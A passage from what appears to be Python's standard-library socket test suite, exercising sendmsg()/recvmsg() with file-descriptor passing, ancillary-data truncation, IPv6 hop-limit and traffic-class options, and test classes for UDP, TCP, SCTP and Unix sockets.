self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG), 1))
def _testCmsgTrunc1(self):
self.createAndSendFDs(1)
def testCmsgTrunc2Int(self):
# The cmsghdr structure has at least three members, two of
# which are ints, so we still shouldn't see any ancillary
# data.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG),
SIZEOF_INT * 2))
def _testCmsgTrunc2Int(self):
self.createAndSendFDs(1)
def testCmsgTruncLen0Minus1(self):
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_LEN(0) - 1))
def _testCmsgTruncLen0Minus1(self):
self.createAndSendFDs(1)
# The following tests try to truncate the control message in the
# middle of the FD array.
def checkTruncatedArray(self, ancbuf, maxdata, mindata=0):
# Check that file descriptor data is truncated to between
# mindata and maxdata bytes when received with buffer size
# ancbuf, and that any complete file descriptor numbers are
# valid.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbuf)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
if mindata == 0 and ancdata == []:
return
self.assertEqual(len(ancdata), 1)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertGreaterEqual(len(cmsg_data), mindata)
self.assertLessEqual(len(cmsg_data), maxdata)
fds = array.array("i")
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
self.checkFDs(fds)
def testCmsgTruncLen0(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(0), maxdata=0)
def _testCmsgTruncLen0(self):
self.createAndSendFDs(1)
def testCmsgTruncLen0Plus1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(0) + 1, maxdata=1)
def _testCmsgTruncLen0Plus1(self):
self.createAndSendFDs(2)
def testCmsgTruncLen1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(SIZEOF_INT),
maxdata=SIZEOF_INT)
def _testCmsgTruncLen1(self):
self.createAndSendFDs(2)
def testCmsgTruncLen2Minus1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(2 * SIZEOF_INT) - 1,
maxdata=(2 * SIZEOF_INT) - 1)
def _testCmsgTruncLen2Minus1(self):
self.createAndSendFDs(2)
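# Note: since Python 3.9 the socket module also provides send_fds() and
# recv_fds() convenience wrappers that perform the SCM_RIGHTS packing
# exercised by hand above.  Roughly (a sketch, not used by these tests):
#
#     sock.sendmsg([b"x"], [(socket.SOL_SOCKET, socket.SCM_RIGHTS,
#                            array.array("i", fds))])
#
# can be written as
#
#     socket.send_fds(sock, [b"x"], fds)
#
# and the receiver can call socket.recv_fds(sock, bufsize, maxfds) instead
# of decoding the ancillary data itself.  The tests here exercise the
# lower-level sendmsg()/recvmsg() interface directly.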
class RFC3542AncillaryTest(SendrecvmsgServerTimeoutBase):
# Test sendmsg() and recvmsg[_into]() using the ancillary data
# features of the RFC 3542 Advanced Sockets API for IPv6.
# Currently we can only handle certain data items (e.g. traffic
# class, hop limit, MTU discovery and fragmentation settings)
# without resorting to unportable means such as the struct module,
# but the tests here are aimed at testing the ancillary data
# handling in sendmsg() and recvmsg() rather than the IPv6 API
# itself.
# Test value to use when setting hop limit of packet
hop_limit = 2
# Test value to use when setting traffic class of packet.
# -1 means "use kernel default".
traffic_class = -1
def ancillaryMapping(self, ancdata):
# Given ancillary data list ancdata, return a mapping from
# pairs (cmsg_level, cmsg_type) to corresponding cmsg_data.
# Check that no (level, type) pair appears more than once.
d = {}
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertNotIn((cmsg_level, cmsg_type), d)
d[(cmsg_level, cmsg_type)] = cmsg_data
return d
def checkHopLimit(self, ancbufsize, maxhop=255, ignoreflags=0):
# Receive hop limit into ancbufsize bytes of ancillary data
# space. Check that data is MSG, ancillary data is not
# truncated (but ignore any flags in ignoreflags), and hop
# limit is between 0 and maxhop inclusive.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 1)
self.assertIsInstance(ancdata[0], tuple)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertEqual(cmsg_type, socket.IPV6_HOPLIMIT)
self.assertIsInstance(cmsg_data, bytes)
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], maxhop)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testRecvHopLimit(self):
# Test receiving the packet hop limit as ancillary data.
self.checkHopLimit(ancbufsize=10240)
@testRecvHopLimit.client_skip
def _testRecvHopLimit(self):
# Need to wait until server has asked to receive ancillary
# data, as implementations are not required to buffer it
# otherwise.
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testRecvHopLimitCMSG_SPACE(self):
# Test receiving hop limit, using CMSG_SPACE to calculate buffer size.
self.checkHopLimit(ancbufsize=socket.CMSG_SPACE(SIZEOF_INT))
@testRecvHopLimitCMSG_SPACE.client_skip
def _testRecvHopLimitCMSG_SPACE(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
# Could test receiving into buffer sized using CMSG_LEN, but RFC
# 3542 says portable applications must provide space for trailing
# padding. Implementations may set MSG_CTRUNC if there isn't
# enough space for the padding.
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSetHopLimit(self):
# Test setting hop limit on outgoing packet and receiving it
# at the other end.
self.checkHopLimit(ancbufsize=10240, maxhop=self.hop_limit)
@testSetHopLimit.client_skip
def _testSetHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))]),
len(MSG))
def checkTrafficClassAndHopLimit(self, ancbufsize, maxhop=255,
ignoreflags=0):
# Receive traffic class and hop limit into ancbufsize bytes of
# ancillary data space. Check that data is MSG, ancillary
# data is not truncated (but ignore any flags in ignoreflags),
# and traffic class and hop limit are in range (hop limit no
# more than maxhop).
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 2)
ancmap = self.ancillaryMapping(ancdata)
tcdata = ancmap[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS)]
self.assertEqual(len(tcdata), SIZEOF_INT)
a = array.array("i")
a.frombytes(tcdata)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
hldata = ancmap[(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT)]
self.assertEqual(len(hldata), SIZEOF_INT)
a = array.array("i")
a.frombytes(hldata)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], maxhop)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testRecvTrafficClassAndHopLimit(self):
# Test receiving traffic class and hop limit as ancillary data.
self.checkTrafficClassAndHopLimit(ancbufsize=10240)
@testRecvTrafficClassAndHopLimit.client_skip
def _testRecvTrafficClassAndHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testRecvTrafficClassAndHopLimitCMSG_SPACE(self):
# Test receiving traffic class and hop limit, using
# CMSG_SPACE() to calculate buffer size.
self.checkTrafficClassAndHopLimit(
ancbufsize=socket.CMSG_SPACE(SIZEOF_INT) * 2)
@testRecvTrafficClassAndHopLimitCMSG_SPACE.client_skip
def _testRecvTrafficClassAndHopLimitCMSG_SPACE(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSetTrafficClassAndHopLimit(self):
# Test setting traffic class and hop limit on outgoing packet,
# and receiving them at the other end.
self.checkTrafficClassAndHopLimit(ancbufsize=10240,
maxhop=self.hop_limit)
@testSetTrafficClassAndHopLimit.client_skip
def _testSetTrafficClassAndHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class])),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))]),
len(MSG))
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testOddCmsgSize(self):
# Try to send ancillary data with first item one byte too
# long. Fall back to sending with correct size if this fails,
# and check that second item was handled correctly.
self.checkTrafficClassAndHopLimit(ancbufsize=10240,
maxhop=self.hop_limit)
@testOddCmsgSize.client_skip
def _testOddCmsgSize(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
try:
nbytes = self.sendmsgToServer(
[MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class]).tobytes() + b"\x00"),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))])
except OSError as e:
self.assertIsInstance(e.errno, int)
nbytes = self.sendmsgToServer(
[MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class])),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))])
self.assertEqual(nbytes, len(MSG))
# Tests for proper handling of truncated ancillary data
def checkHopLimitTruncatedHeader(self, ancbufsize, ignoreflags=0):
# Receive hop limit into ancbufsize bytes of ancillary data
# space, which should be too small to contain the ancillary
# data header (if ancbufsize is None, pass no second argument
# to recvmsg()). Check that data is MSG, MSG_CTRUNC is set
# (unless included in ignoreflags), and no ancillary data is
# returned.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
args = () if ancbufsize is None else (ancbufsize,)
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), *args)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testCmsgTruncNoBufSize(self):
# Check that no ancillary data is received when no ancillary
# buffer size is provided.
self.checkHopLimitTruncatedHeader(ancbufsize=None,
# BSD seems to set
# MSG_CTRUNC only if an item
# has been partially
# received.
ignoreflags=socket.MSG_CTRUNC)
@testCmsgTruncNoBufSize.client_skip
def _testCmsgTruncNoBufSize(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc0(self):
# Check that no ancillary data is received when ancillary
# buffer size is zero.
self.checkHopLimitTruncatedHeader(ancbufsize=0,
ignoreflags=socket.MSG_CTRUNC)
@testSingleCmsgTrunc0.client_skip
def _testSingleCmsgTrunc0(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
# Check that no ancillary data is returned for various non-zero
# (but still too small) buffer sizes.
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc1(self):
self.checkHopLimitTruncatedHeader(ancbufsize=1)
@testSingleCmsgTrunc1.client_skip
def _testSingleCmsgTrunc1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc2Int(self):
self.checkHopLimitTruncatedHeader(ancbufsize=2 * SIZEOF_INT)
@testSingleCmsgTrunc2Int.client_skip
def _testSingleCmsgTrunc2Int(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTruncLen0Minus1(self):
self.checkHopLimitTruncatedHeader(ancbufsize=socket.CMSG_LEN(0) - 1)
@testSingleCmsgTruncLen0Minus1.client_skip
def _testSingleCmsgTruncLen0Minus1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTruncInData(self):
# Test truncation of a control message inside its associated
# data. The message may be returned with its data truncated,
# or not returned at all.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(
self.serv_sock, len(MSG), socket.CMSG_LEN(SIZEOF_INT) - 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 1)
if ancdata:
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertEqual(cmsg_type, socket.IPV6_HOPLIMIT)
self.assertLess(len(cmsg_data), SIZEOF_INT)
@testSingleCmsgTruncInData.client_skip
def _testSingleCmsgTruncInData(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
def checkTruncatedSecondHeader(self, ancbufsize, ignoreflags=0):
# Receive traffic class and hop limit into ancbufsize bytes of
# ancillary data space, which should be large enough to
# contain the first item, but too small to contain the header
# of the second. Check that data is MSG, MSG_CTRUNC is set
# (unless included in ignoreflags), and only one ancillary
# data item is returned.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 1)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertIn(cmsg_type, {socket.IPV6_TCLASS, socket.IPV6_HOPLIMIT})
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
# Try the above test with various buffer sizes.
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc0(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT),
ignoreflags=socket.MSG_CTRUNC)
@testSecondCmsgTrunc0.client_skip
def _testSecondCmsgTrunc0(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc1(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) + 1)
@testSecondCmsgTrunc1.client_skip
def _testSecondCmsgTrunc1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc2Int(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) +
2 * SIZEOF_INT)
@testSecondCmsgTrunc2Int.client_skip
def _testSecondCmsgTrunc2Int(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTruncLen0Minus1(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) +
socket.CMSG_LEN(0) - 1)
@testSecondCmsgTruncLen0Minus1.client_skip
def _testSecondCmsgTruncLen0Minus1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTruncInData(self):
# Test truncation of the second of two control messages inside
# its associated data.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(
self.serv_sock, len(MSG),
socket.CMSG_SPACE(SIZEOF_INT) + socket.CMSG_LEN(SIZEOF_INT) - 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
cmsg_types = {socket.IPV6_TCLASS, socket.IPV6_HOPLIMIT}
cmsg_level, cmsg_type, cmsg_data = ancdata.pop(0)
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
cmsg_types.remove(cmsg_type)
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
if ancdata:
cmsg_level, cmsg_type, cmsg_data = ancdata.pop(0)
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
cmsg_types.remove(cmsg_type)
self.assertLess(len(cmsg_data), SIZEOF_INT)
self.assertEqual(ancdata, [])
@testSecondCmsgTruncInData.client_skip
def _testSecondCmsgTruncInData(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
# Derive concrete test classes for different socket types.
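# Naming convention reminder: for each server-side test method testFoo(),
# the threaded mixins run the matching _testFoo() method in the client
# thread, and decorators such as @testFoo.client_skip apply the same skip
# condition to the client-side counterpart.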
class SendrecvmsgUDPTestBase(SendrecvmsgDgramFlagsBase,
SendrecvmsgConnectionlessBase,
ThreadedSocketTestMixin, UDPTestBase):
pass
@requireAttrs(socket.socket, "sendmsg")
class SendmsgUDPTest(SendmsgConnectionlessTests, SendrecvmsgUDPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
class RecvmsgUDPTest(RecvmsgTests, SendrecvmsgUDPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
class RecvmsgIntoUDPTest(RecvmsgIntoTests, SendrecvmsgUDPTestBase):
pass
class SendrecvmsgUDP6TestBase(SendrecvmsgDgramFlagsBase,
SendrecvmsgConnectionlessBase,
ThreadedSocketTestMixin, UDP6TestBase):
def checkRecvmsgAddress(self, addr1, addr2):
# Called to compare the received address with the address of
# the peer, ignoring scope ID
self.assertEqual(addr1[:-1], addr2[:-1])
@requireAttrs(socket.socket, "sendmsg")
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class SendmsgUDP6Test(SendmsgConnectionlessTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgUDP6Test(RecvmsgTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgIntoUDP6Test(RecvmsgIntoTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
@requireAttrs(socket, "IPPROTO_IPV6")
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgRFC3542AncillaryUDP6Test(RFC3542AncillaryTest,
SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
@requireAttrs(socket, "IPPROTO_IPV6")
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgIntoRFC3542AncillaryUDP6Test(RecvmsgIntoMixin,
RFC3542AncillaryTest,
SendrecvmsgUDP6TestBase):
pass
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
class SendrecvmsgUDPLITETestBase(SendrecvmsgDgramFlagsBase,
SendrecvmsgConnectionlessBase,
ThreadedSocketTestMixin, UDPLITETestBase):
pass
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
@requireAttrs(socket.socket, "sendmsg")
class SendmsgUDPLITETest(SendmsgConnectionlessTests, SendrecvmsgUDPLITETestBase):
pass
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
@requireAttrs(socket.socket, "recvmsg")
class RecvmsgUDPLITETest(RecvmsgTests, SendrecvmsgUDPLITETestBase):
pass
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
@requireAttrs(socket.socket, "recvmsg_into")
class RecvmsgIntoUDPLITETest(RecvmsgIntoTests, SendrecvmsgUDPLITETestBase):
pass
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
class SendrecvmsgUDPLITE6TestBase(SendrecvmsgDgramFlagsBase,
SendrecvmsgConnectionlessBase,
ThreadedSocketTestMixin, UDPLITE6TestBase):
def checkRecvmsgAddress(self, addr1, addr2):
# Called to compare the received address with the address of
# the peer, ignoring scope ID
self.assertEqual(addr1[:-1], addr2[:-1])
@requireAttrs(socket.socket, "sendmsg")
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class SendmsgUDPLITE6Test(SendmsgConnectionlessTests, SendrecvmsgUDPLITE6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgUDPLITE6Test(RecvmsgTests, SendrecvmsgUDPLITE6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgIntoUDPLITE6Test(RecvmsgIntoTests, SendrecvmsgUDPLITE6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
@requireAttrs(socket, "IPPROTO_IPV6")
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgRFC3542AncillaryUDPLITE6Test(RFC3542AncillaryTest,
SendrecvmsgUDPLITE6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
@requireAttrs(socket, "IPPROTO_IPV6")
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgIntoRFC3542AncillaryUDPLITE6Test(RecvmsgIntoMixin,
RFC3542AncillaryTest,
SendrecvmsgUDPLITE6TestBase):
pass
class SendrecvmsgTCPTestBase(SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, TCPTestBase):
pass
@requireAttrs(socket.socket, "sendmsg")
class SendmsgTCPTest(SendmsgStreamTests, SendrecvmsgTCPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
class RecvmsgTCPTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgTCPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
class RecvmsgIntoTCPTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgTCPTestBase):
pass
class SendrecvmsgSCTPStreamTestBase(SendrecvmsgSCTPFlagsBase,
SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, SCTPStreamBase):
pass
@requireAttrs(socket.socket, "sendmsg")
@unittest.skipIf(AIX, "IPPROTO_SCTP: [Errno 62] Protocol not supported on AIX")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
class SendmsgSCTPStreamTest(SendmsgStreamTests, SendrecvmsgSCTPStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipIf(AIX, "IPPROTO_SCTP: [Errno 62] Protocol not supported on AIX")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
class RecvmsgSCTPStreamTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgSCTPStreamTestBase):
def testRecvmsgEOF(self):
try:
super(RecvmsgSCTPStreamTest, self).testRecvmsgEOF()
except OSError as e:
if e.errno != errno.ENOTCONN:
raise
self.skipTest("sporadic ENOTCONN (kernel issue?) - see issue #13876")
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipIf(AIX, "IPPROTO_SCTP: [Errno 62] Protocol not supported on AIX")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
class RecvmsgIntoSCTPStreamTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgSCTPStreamTestBase):
def testRecvmsgEOF(self):
try:
super(RecvmsgIntoSCTPStreamTest, self).testRecvmsgEOF()
except OSError as e:
if e.errno != errno.ENOTCONN:
raise
self.skipTest("sporadic ENOTCONN (kernel issue?) - see issue #13876")
class SendrecvmsgUnixStreamTestBase(SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, UnixStreamBase):
pass
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "AF_UNIX")
class SendmsgUnixStreamTest(SendmsgStreamTests, SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@requireAttrs(socket, "AF_UNIX")
class RecvmsgUnixStreamTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@requireAttrs(socket, "AF_UNIX")
class RecvmsgIntoUnixStreamTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "sendmsg", "recvmsg")
@requireAttrs(socket, "AF_UNIX", "SOL_SOCKET", "SCM_RIGHTS")
class RecvmsgSCMRightsStreamTest(SCMRightsTest, SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "sendmsg", "recvmsg_into")
@requireAttrs(socket, "AF_UNIX", "SOL_SOCKET", "SCM_RIGHTS")
class RecvmsgIntoSCMRightsStreamTest(RecvmsgIntoMixin, SCMRightsTest,
SendrecvmsgUnixStreamTestBase):
pass
# Test interrupting the interruptible send/receive methods with a
# signal when a timeout is set. These tests avoid having multiple
